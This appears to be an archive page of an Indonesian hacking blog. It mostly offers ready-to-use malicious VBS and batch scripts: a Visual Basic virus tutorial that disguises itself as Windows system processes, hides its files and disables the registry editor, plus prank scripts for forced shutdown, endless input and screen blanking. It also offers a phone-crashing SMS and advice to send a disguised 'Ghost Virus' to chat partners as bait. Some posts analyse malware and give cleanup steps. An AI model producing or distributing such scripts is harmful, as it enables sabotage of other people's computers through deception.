-->
Welcome To Team Hacker This Blog Created By Ryan Cracker Dont Forget To Follow Or Coments My Entri's
Showing posts with label virus bat. Show all posts
Showing posts with label virus bat. Show all posts

Thursday, January 5, 2012

Virus Mbah Surip - Cara kerja dan penanggulangannya

Setelah dihebohkan dengan dengan virus MJ alias Michael Jackson, baru-baru ini beredar juga virus lokal dengan nama Virus "Mbah Surip"
Virus ini buatan anak negeri dengan menggunakan bahasa pemrograman Visual Basic ( VBS )
Meskipun hanya menggunakan VBS tapi virus ini cukup merepotkan.

Penyanyi lagu 'Tak Gendong' itu akan muncul pertama kali ketika komputer yang telah terinfeksi memasuki Internet Explorer. Dengan demikian, korban selanjutnya akan disusupi folder bernama 'Album Bokep' di setiap drive maupun flash disk yang isinya seakan-akan file film porno. Namun folder 'panas' itu sebenarnya merupakan file virus yang siap 'menggendong' komputer Anda bila dijalankan.

Bagaimana Virus Mbah Surip bekerja


File induk VBS/Cryf.A ini mempunyai nama [drvconfg.drv] dengan ukuran file sebesar 218 KB, file ini mempunyai ekstensi [.drv] dan mempunyai type file sebagai 'device driver', file ini akan di enkipsi sehingga kode virusnya tidak mudah di baca.

Pada saat file virus dijalankan, pertama kali yang akan di lakukan adalah memanggil file [svchost.vbs] yang sudah dienkript yang berada di direktori [%Driver%:\Recycled\S-1-5-21-343818398-18970151121-842a92511246-500\Thumbs.db]. Kemudian file [svchost.vbs] ini akan menjalankan file utama virus yakni file [drvconfg.drv], file inilah yang berisi runtime untuk menginfeksi dan menanamkan aksi-aksi lain nya di dalam komputer target.

Pada saat user menjalankan dirinya, VBS/Cryf.A akan memanggil program [Windows Media Player]. Kemudian akan membuat beberapa file induk yang salah satunya akan dijalankan saat komputer dinyalakan.

Sementara untuk mempertahankan eksistensinya, ia akan mencoba untuk blok beberapa fungsi windows seperti: Task Manager, Regedit, CMD, MSCONFIG, hingga tidak dapat merubah Wallpaper

Selain itu, virus ini juga akan menyembunyikan file tersebut [regedit.exe, tskmgr.exe. cmd.exe dan MSConfig.exe] dan sebagai gantinya ia akan membuat file yang sama. Bedanya, ia akan mempunyai dua ekstensi yakni [.exe.lnk], antara file 'gadungan' dan file asli akan mempunyai icon yang sama. Jika user mencoba untuk memanggil salah satu fungsi Windows tersebut maka akan muncul pesan error.

Tetapi jika user mencoba untuk langsung menjalankan file 'gadungan' yang telah dibuat oleh virus sebagai pengganti file asli yang telah disembunyikan [contoh: regedit.exe.lnk] maka secara otomatis akan menjalankan file virus yang berada di direktori [C:\WINDOWS\system32\svchost.dls].

Tak hanya itu, ia juga akan melakukan Debugger terhadap ketiga fungsi windows tersebut untuk menjalankan file virus [C:\WINDOWS\appsys.exe] dengan membuat string pada registry.

Beberapa tools security khususnya antivirus lokal seperti PCMAV atau ANSAV. VBS/Cryf.A juga akan melakukan Debugger terhadap program yang telah ditentukan dengan membuat string.

Virus ini juga akan mencoba untuk mengaktifkan dirinya secara otomatis dengan menjalankan file [C:\windows\system\svchost.exe atau C:\windows\WinUpdt.scx] setiap kali user menjalankan file yang mempunyai ekstensi berikut: .reg, .vbs, dan .inf.


Penanggulangan virus Mbah Surip :

Vaksincom yang membuat ramuan untuk memberantas virus ini ( detikcom )

1. Matikan proses virus yang sedang aktif di memori. Untuk mematikan proses virus ini silahkan gunakan tools pengganti task manager seperti Currproses, kemudian matikan proses yang mempunyai product name 'Microsoft ® Windows Script Hosta' dengan cara:

Pilih [blok] proses yang mempunyai product name 'Microsoft ® Windows Script Hosta'
Klik kanan pada proses yang sudah di blok
Pilih [Kill Selected Processes]


2. Blok agar file virus tidak dapat dijalankan untuk sementara selama proses pembersihan dengan menggunakan fitur 'Software Restriction Policiesa', fitur ini hanya ada di Windows XP/2003/Vista/2008. Untuk blok file tesebut lakukan langkah berikut:

Klik menu [Start]
Klik [Run]
Pada dialog box [Run], ketik SECPOL.MSC kemudian klik tombol [OK]
Pada layar [Local Security Policy], klik [Software restriction policies]
Klik kanan pada [software restriction policies] dan pilih [Create new policies]
Kemudian klik kanan di [Additional Rule], dan pilih [New Hash Rule].
Di Kolom [File Hash], klik tombol [Browse] dan pilih file yang akan diblok. Pada kolom [File information] akan terisi informasi dari file tersebut secara otomatis.
* Pada Security Level pilih [Disallowed]
* Pada kolom 'descriptiona' isi deskripsi dari nama file tersebut (bebas),

3. Fix Registry dengan menjalankan file [FixRegistry.exe], silahkan download dsini
4. Hapus file induk virus yang telah dibuat. File induk virus ini akan disembunyikan. Jika file induk tersebut tidak dapat ditampilkan silahkan gunakan tools penggganti Windows Explorer seperti 'Explorer XP'. Silahkan download di alamat berikut:
http://www.explorerxp.com/explorerxpsetup.exe

Setelah software tersebut di install, cari dan hapus file berikut: svchost.vbs, desktop.ini, drvconfg.drv. SHELL32.dll, %Drive%:\Album BOKEP\Naughty America dan C:\windows.

5. Tampilkan file [TaskMgr.exe/Regedt32.exe/Regedit.exe/CMD.exe/Logoff.exe] yang disembunyikan oleh virus, caranya:

Klik menu [Start]
Klik [Run]
Ketik CMD kemudian klik tombol [OK]
Pada layar 'Dos Prompt' pindahkan posisi kursor ke drive yang akan di periksa
Ketik perintah ATTRIB regedit.exe kemudian klik tombol
Kemudian ketik perintah saya yang membedakan hanya nama file yang akan ditampilkan yakni Taskmgr.exe, cmd.exe dan Logoff.exe

6. Untuk pembersihan optimal dan mencegah infeksi ulang silahkan install dan scan dengan antivirus yang up-to-date.

7. Jika komputer sudah benar-benar bersih dari virus, hapus rule blok file [WSCript.exe] yang telah dibuat pada langkah nomor 2, caranya:

Klik menu [Start]
Klik [Run]
Pada dialog box [Run], ketik SECPOL.MSC kemudian klik tombol [OK]
Pada layar [Local Security Policy], klik 2x [Software restriction policies]
Klik [Additional Rule]
Hapus Rule yang pernah Anda buat sebelumnya
Read more »

cara membuat virus HP

VIRUS untuk handphone/hp, bukan VIRUS TROJAN, WAlLWARE. kenapa VIRUS yang saya buat bukan untuk komputer / PC Melainkan untuk handphone?
Nah ... Sekarang saya akan membagikan ilmu tentang cara membuat VIRUS untuk Hp, sebelumnya pernahkah anda mendapat SMS ketika anda membuka SMS tersebut dan menekan arah bawah maka handphone anda akan secara otomatis akan mati, namun VIRUS ini tidak berbahaya, silahkan copy code virus ini dan kirim ke handphone anda melalui sistem pengiriman SMS melalui internet, seperti yahoo, dll, sebenarnya di blog saya dulu ada sistem pengiriman pesan melalui internet ke Hp tetapi sudah saya hapus, karena saya tidak ingin program ini di pakai untuk menipu! Silahkan copy codedi bawah, ini type SMS yang harus anda kirim, kata-kata yang di atas bisa di ubah, tetapi jangan hapus code dan tanda enternya!
Silahkan copy dari bawah sini!


JANGAN TEKAN ARAH BAWAH, INI BUKAN SMS BIASA











_¯_¯_¯_¯ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_0


Jika Abng Bingung, download Contoh virusnya http://www.ziddu.com/download/10566145/V...s.txt.html

terus pindah ke handphone anda

Nah ingat, virus ini hanya mematikan handphone teman yang di kirimi anda sms, sebenarnya program ini bisa disebut Virus tetapi saya lebih senang menyebutnya program meNON AKTIFKAN handphone tanpa menekan tombol tunoff pada hp!
Cara mengaktifkan hp kembali, anda hanya perlu mengaktifkanya kembali, tetapi virus ini hanya aktif pada handphone yang tidak memiliki pasilitas HSDP, HSDPA, yang tentunya pada hp yang tidak ada antivirusnya, minimal handphone yang gak ada cameranya,
Nah silahkan mencoba!
Read more »

Saturday, October 1, 2011

Bikin Virus Buat Isengin Temen

"Bosen dengan belajar, mau iseng? Yuk, kita pakai cara sederhana saja untuk ngisengin teman kita sendiri.

Tapi jangan anda coba trik ini di komputer anda, klo dicoba berarti anda mengisengin diri anda sendiri & dapat dibilang anda melakukan tindakan yang stup*d.. Hehe.. Wkwk..

Lets begin! Pastikan Anda Mengetik Dengan Benar Script Dibawah Ini! Copy Paste Kadang Tidak Berhasil Dikarenakan Perbedaan Tanda Petik ( ” ” ) Pada Notepad, Untuk Lebih Fix Bisa Pake TextPad

1. Iseng Mengeject CD-Drive Terus Menerus


Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda


2. Iseng Dengan Tombol Enter Terus Menerus

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda

3. Iseng Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks!”

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(”WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda

4. Iseng Dengan Backspace

MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda

5. Iseng Dengan Membuka Calculator Terus Menerus

@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top

Kemudian save dengan “SUKASUKAANDA.BAT” & Berikan keteman Anda

6. Iseng Dengan Keyboard

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop

Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda

7. Iseng Dengan Shutdown Computer

@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0

Kemudian save dengan “SUKASUKAANDA.BAT” & Berikan keteman Anda


Cara mematikan program diatas sbb :

1. buka task manager (ctrl+alt+del)
2. lalu cari wscript
3. matikan wscript dengan cara klik end process
4. dan akhirnya program notepad yang anda buat mati"
Read more »

share virus jahil,... :)

permisi akang2 ane cuma numpang share virus ini aja
cuma buat jahil2an kok gak berbahaya2 amat nih
di save dengan extensi .vbs

cekidot script nya :
Spoiler:

semoga bermanfaat ya
Read more »

Tuesday, May 10, 2011

Konsep Dasar Pembuatan Virus Di Visual Basic

Pertama, bikin form buat virus kamu pake Standart exe saja
1. menyembunyikan Form

Quote:Private Sub Form_Load()
App.TaskVisible = False
End Sub


2. Copy Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows
Quote:On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori
Quote:On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Quote:Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
Quote:sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attribute s = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attribute s = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file
Quote:On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit
Quote:On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Quote:Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”
Read more »

Bagi-bagi script virus/worm .bat

nih Q bagi-bagi script virus/worm
tinggal copas aja tapi save as .bat
----------------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-------------------------------END------------------------------------
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
-----------------------------------END-------------------------------

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
-----------------------------------END-------------------------------
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
---------------------------------END---------------------------------
Read more »

Membuat komputer hantu dengan Ghost Virus

[Image: ghost-in-computer.jpg]

Pernah terpikir tentang komputer hantu? bunyi-bunyi sendiri, keluar layar berwarna hitam, keluar pesan aneh, disk drive terbuka sendiri, dan lain-lain. Bagaimana jika yang jadi korban adalah teman anda, dan yang menyababkanya adalah anda. Tentu sangat menarik bukan? Pada artikel sebelumnya telah saya singgung tentang The Ultimate Virus yang bisa membuat teman anda cemas setengah mati. Sedangkan Program prank kali ini bernama Ghost Virus yang bisa membuat teman anda takut setengah mati.

Berikut akibat yang akan ditimbulkan saat program dijalankan:
1. Mematikan Disk Manager
2. Mematikan Registry Editor
3. Mematikan MS Config
4. Mematikan Command Prompt
5. Mematikan Explorer
6. Mematikan Shutdown
7. Mematikan Task Manager
8. Bunyi beep setiap 100 ms
9. Menampilkan layar hitam setiap 2 detik
10. Menampilkan pesan aneh
11. Restart sendiri
12. Membuka/menutup disk drive setiap 100 ms
13. Menyembunyikan kursor
14. Mematikan Alt+CTRL+Del

Menarik bukan? apalagi jika diaktifkan pada malam hari. Caranya gunakan Schedule Task dari control panel. Buat schedule task baru menuju program ini, kemudian atur jadwalnya pada malam hari. xi..xi..xi

Cara lain dapat anda samarkan programnya dengan icon gambar. Kemudian kirim ke teman chatting kamu malam hari. Katakan kamu ada gambar BB +17 bagus. Doi pasti bisa dikerjain, makan tuh BB! wkwkwk

Download

Catatan:
- Beberapa anti virus mungkin mendeteksi ini sebagai virus
- Untuk mematikan program tekan tombol "P"
Read more »

Saturday, April 30, 2011

matrix.bat

klao yang uda pada tau dan kalo ni thread ga guna diapus aja
kemarin sya jlan2 nemu ni nih lmayan keren dicoba aja ni code


@echo off
color 2
cls
:A
echo 3 2 3 4 6 8 4 2 3 9 7 3 4 9 7 5 3 1 7 9 1 0 9 2 4 6 2 1 3 4 5 3 5 2 1 0 3 6
echo 2 5 5 6 4 7 1 8 6 8 6 0 8 6 4 1 5 6 4 6 8 8 0 3 1 4 6 8 4 7 8 6 2 1 5 7
:B
echo 5 8 9 2 3 6 8 7 1 2 5 3 6 5 4 2 0 8 9 4 0 3 7 4 2 2 8 9 2 0 1 5 6 5 8
:C
echo 5 9 6 8 4 6 8 4 6 8 4 2 6 4 6 8 1 6 6 8 1 0 6 8 1 6 8 1 6 1 6 5 4 5 6 9 8 7
echo 6 5 1 6 6 0 6 4 6 1 6 5 1 7 5 3 8 5 1 6 5 1 6 0 1 6 0 4 3 4 1 2 4 0 4 3 2
goto A
goto B
goto C

copas ke notepad dan di save dengan nama matrix.bat
Read more »

Konsep Dasar Pembuatan Virus Di Visual Basic

Pertama, bikin form buat virus kamu pake Standart exe saja
1. menyembunyikan Form

Quote:Private Sub Form_Load()
App.TaskVisible = False
End Sub


2. Copy Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows
Quote:On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori
Quote:On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Quote:Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
Quote:sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attribute s = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attribute s = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file
Quote:On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit
Quote:On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Quote:Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Nah sekian dulu ... Selamat Belajar
Read more »

Meminimalisir Penyebaran Virus

1. Disabled autorun caranya :
Tekan tombol windows+R maka akan muncul tampilan kotak dialog seperti di bawah

[Image: gpedit.bmp]

Kemudian Tekan Ok
Kenapa Tombol windows karena setahu saya virus Cuma ada di windows :D
Setelah OK maka akan muncul kotak dialog Group Policy

[Image: gpedit_system.bmp]

Pilih Menu Administrative Templates
Kemudian Pilih Sub menu system

Double Click Pada turn off autoplay
Maka akan muncul kotak dialognya

[Image: turnoff+aito+play.bmp]

Kemudian Pilih enable lalu pada Turn off Autoplaynya pilih all drives
Terus OK dech …

Nah dah selesai tuch buat disable autorun nya …
Sekarang menuju langkah berikutnya Yaitu

2. Menonaktifkan system restore

Click tombol start lalu click akan my computer kemudian pilih properties

[Image: mycomputer.bmp]

Maka akan muncul kotak dialog
Pilih Tab system Restore
Kemudian Click Turn off system restore on
All drives … OK lagi dec …

[Image: system+restore.bmp]

Menonaktifkan system restore juga dah selesai sekarang kita menuju tahap selanjutnya …

3. Menonaktifkan recycleBin
Langkahnya :
Buka Explorer atau bias langsung di desktop click kanan recyclebin dan pilih properties

[Image: recyclebin.bmp]

Maka akan muncul kotak dialog recycle bin

[Image: recyclebinlagi.bmp]

Pilih use one setting for all drives
Cek pada do not … seperti gambar …
Ok lagi dech … ^_^
Nah dah selesai tuch … semoga bermanfaat
Read more »

X-Fly.worm

Nama Malware : W32.SillyFDC [Symantec], Worm.Win32.VB.ml [Kaspersky Lab], New Malware.iu [McAfee]
Ukuran : 172,032 bytes
Icon : icon folder, icon mp3, icon avg
Dibuat dengan: Visual Basic

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command]
(Default) = "%Windir%\r4m83.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.DYS]
(Default) = "exefile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.fly]
(Default) = "exefile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.FYS]
(Default) = "exefile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.HHS]
(Default) = "exefile"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
NoFolderOptions = 0x00000001
NoFind = 0x00000001
NoRun = 0x00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
mediaplayer = "%System%\realplay.exe"
real = "C:\soulfly\r4m83.exe"
soul = "C:\soulfly\isass.exe"
DLL = "C:\soulfly\RCSS.exe"
real1 = "D:\soulfly\r4m83.exe"
soul2 = "D:\soulfly\isass.exe"
ETC = "D:\soulfly\RCSS.exe"
NTLR = "C:\MSNTLR.DYS"
ELC = "C:\MSFLC.FYS"
DLF = "C:\MSDLF.HHS"
NTLS = "%Windir%\NTLS.DYS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
DisableSR = 0x00000001
LimitSystemRestoreCheckpointing = 0x00000001
DisableMSI = 0x00000001
DisableConfig = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]
ExeRun = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
ExeRun = 0x00000001
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
Window Title = "..:: x-fly ::.."
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableRegistryTools = 0x00000001
DisableTaskMgr = 0x00000001
DisableCMD = 0x00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
r4m83 = "%Windir%\r4m83.exe"
regscv32 = "%System%\RCSS.exe"
isass = "%Windir%\system\isass.exe"
NTLR = "C:\MSNTLR.DYS"
ELC = "C:\MSFLC.FYS"
DLF = "C:\MSDLF.HHS"
NTLS = "%Windir%\NTLS.DYS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command]
(Default) = "%Windir%\r4m83.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command]
(Default) = "%Windir%\r4m83.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command]
(Default) = "%Windir%\r4m83.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Shell = "Explorer.exe, %System%\RCSS.exe"
System = "%System%\RCSS.exe "
Userinit = "%System%\userinit.exe,%System%\RCSS.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]
AlternateShell = "%System%\RCSS.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot]
AlternateShell = "%System%\RCSS.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
AlternateShell = "%System%\RCSS.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
Start Page = "%CommonPrograms%\Startup\rj.html"


Sesaat setelah scanning, dari sekian file virus yang terdeteksi ada satu file yang tidak bisa dihapus. File itu beralamat di:
”c:\windows\system32\Rcss.exe”
Hal itu disebabkan karena process file tersebut masih aktif. Supaya process file tersebut bisa mati, pake task manager ya…

jika ada kesalahan ane minta maaf!!! 
Read more »

script virus/worm .bat

nih Q bagi-bagi script virus/worm
tinggal copas aja tapi save as .bat
----------------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-------------------------------END------------------------------------
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
-----------------------------------END-------------------------------

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
-----------------------------------END-------------------------------
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
---------------------------------END---------------------------------
Read more »